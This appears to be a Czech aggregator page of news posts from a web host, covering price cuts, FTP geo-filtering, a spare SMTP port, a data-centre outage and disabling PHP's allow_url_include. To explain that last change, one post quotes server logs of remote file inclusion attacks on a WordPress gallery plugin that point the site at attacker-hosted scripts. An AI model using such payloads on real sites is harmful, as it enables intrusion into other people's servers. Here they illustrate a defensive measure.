Hostlogy O čem píší české webhostingy

Přání do nového roku 2010

Přejeme Vám vše nejlepší do nového roku 2010, zdraví, štěstí, mnoho úspěchu v práci či podnikání a ať jste i nadále spokojeni s našimi službami.

Snižujeme ceny CZ domén

Od nového roku snižujeme ceny CZ domén, od ledna tak koupíte českou doménu za 255 Kč bez DPH. Snížení ceny se týká samozřejmě i prodlužování již registrovaných domén.

Navýšení prostoru na 10 GB u tarifu Online, emailové schránky na 250 MB

Zdesetinásobili jsme prostor pro stránky v tarifu Online - nyní je k dispozici celých 10 GB. Standardní velikost emailových schránek se mění na 250 MB, pokud potřebujete více, stačí napsat na technickou podporu a schránku zdarma a rádi zvětšíme.

Zavedli jsme filtraci FTP – připojit se lze jen z Česka a dalších okolních zemí

Vzhledem ke stále častějším útokům ze zahraničí na webové stránky skrz ftp účet, jsme provedli následující opatření. Na ftp účet se lze nyní připojit standardní cestou (tj. na port 21) jen z Česka, Slovenska, Německa, Rakouska a Polska.

Pro ty z vás, kteří se potřebují připojovat ze zahraničí, jsme zřídili extra port 10021, který není filtrovaný a umožňuje připojení odkudkoliv.

Pokud se tedy chcete připojit na ftp ze zahraničí, stačí v Total Commanderu zadat jako hostitele vase_domena.cz:10021.

Pokud byste se nemohli připojit a zároveň byste byli za proxy serverem nebo firewallem, který neumožňuje připojení k ftp na jiný port než 21, kontaktujte nás. Povolíme vám přístup z konkrétní IP adresy.

Služba Webftp (webový přístup k FTP) tímto dotčená není. Přes ni se lze připojit odkudkoliv. Prozatím se filtrace týká webhostingu Online.

Druhý smtp port pro odesílání pošty

Jelikož stále více wifi poskytovatelů, hotelů apod. blokují odesílání pošty přes standardní smtp port 25, zprovoznili jsme druhý port pro odesílání pošty, a to 10025.

Často se k těmto sítím připojují zavirované počítače rozesílající tisíce spamů denně, tím se jednak poskytovatel dostává rychle na spamový blacklist (které na našem emailserveru také používáme), a zároveň také rapidně zpomaluje rychlost internetu. Proto se mnoho poskytovatelů uchyluje k filtrování odchozích připojení na port 25, a tím pádem nelze přes náš smtp server odesílat poštu.

MySQL server – opravena drobná chyba při zřizování účtu

Opravili jsme v hostingové administraci malou chybičku, která se projevovala při automatickém zřizování MySQL účtu, a to pouze, pokud jste měli u administračního kontaktu nastaveno více emailových adres. V takovém případě email se zřízeným MySQL účtem nedošel. Nyní již vše pracuje korektně.

Casablanca INT a proč naše servery byly ráno nedostupné

Dnes v ranních hodinách došlo k výpadku v poskytování našich služeb. Na vině byl výpadek elektřiny telehousu našeho hlavního serverhousingového poskytovatele Casablanca INT. Za vzniklé problémy se Vám omlouváme.

Zde otiskujeme oficiální stanovisko spol. Casablanca INT k vzniklé situaci:

Vážený zákazníci,

velice se Vám omlouváme za omezení Vašich služeb, ke kterému došlo
dnes 8.4.2009 v ranních hodinách.

Příčinou výpadku byla havárie (zkrat) na energetické síti mimo
infrastrukturu našeho Telehouse centra. Vzhledem k rozsahu havárie
naše záložní systémy musely bohužel omezit dodávku napájení do části
naší sítě, konkrétně do serveroven HC2,4,5 a 16. V této souvislosti
došlo i k přerušení části naší infrastruktury, která je umístěna
v těchto serverovnách. Funkčnost páteřní sítě nebyla přerušena.
K havárii došlo v čase 4:05, zálohované napájení bylo postupně
obnovováno v čase 4:10 – 4:30 a zákaznické služby byly s maximální
intenzitou znovu obnovovány od 4:30.

Všichni zaměstnanci naší společnosti vyvinuli ihned po havárii
maximální úsilí k co nejrychlejšímu obnovení postižených služeb.

V případě jakéhokoliv dotazu prosím kontaktujte naše technické
oddělení, tel: 270 000 235, email: tech@casablanca.cz

Omlouváme se za případné komplikace a děkujeme za pochopení.

S pozdravem,

Obchodní oddělení

Casablanca INT s.r.o.
Vinohradská 184 | Praha 3 | PSČ 130 52
Telefon: +420 270 000 270
Email: obchod@casablanca.cz | www.casablanca.cz

Zakázali jsme u funkcí include a require načítání zdrojového kódu z cizích webserverů

Z důvodu nárůstu útoků na webové aplikace jsme na všech serverech zakázali u funkce Include a Require načtení zdrojového souboru z cizího webové serveru, tj. přes http nebo ftp. Na funkce fopen() by tato změna neměla mít vliv. Pokud byste potřebovali nahrávat věci z cizího serveru, použijte buď již zmiňovanou funkci fopen() nebo file_get_contents().

Zákaz jsme provedli přes direktivu allow_url_include = Off.

A jak takový útok např. může vypadat? Ukázka z logu - komentář snad netřeba:

xxxx.cz 80.254.74.63 - - [08/Dec/2008:18:11:18 +0100] "GET /?myPath=http://www.freewebs.com/albalbo/xx.txt?? HTTP/1.1" 200 229 "-" "Mozilla/3.0 (compatible; Indy Library)"

xxxx.cz 80.254.74.63 - - [08/Dec/2008:18:11:14 +0100] “GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.freewebs.com/albalbo/xx.txt?? HTTP/1.1″ 200 229 “-” “Mozilla/3.0 (compatible; Indy Library)”

xxxx.cz 80.254.74.63 - - [08/Dec/2008:18:14:33 +0100] “GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.freewebs.com/albalbo/xx.txt?? HTTP/1.1″ 200 229 “-” “Mozilla/3.0 (compatible; Indy Library)”

xxxx.cz 76.162.254.213 - - [08/Dec/2008:18:58:40 +0100] “GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://pastebin.linode.com/?dl=1581??? HTTP/1.1″ 200 227 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1″

Magento – nejlepší open source eshop ve verzi 1.1.6

Dne 17. září byla uvolněna nová verze nejlepšího Open Source eshopu Magento. Verze 1.1.6 opravuje chyby v řadě 1.1.x.

Další informace na blogu tvůrců Magenta.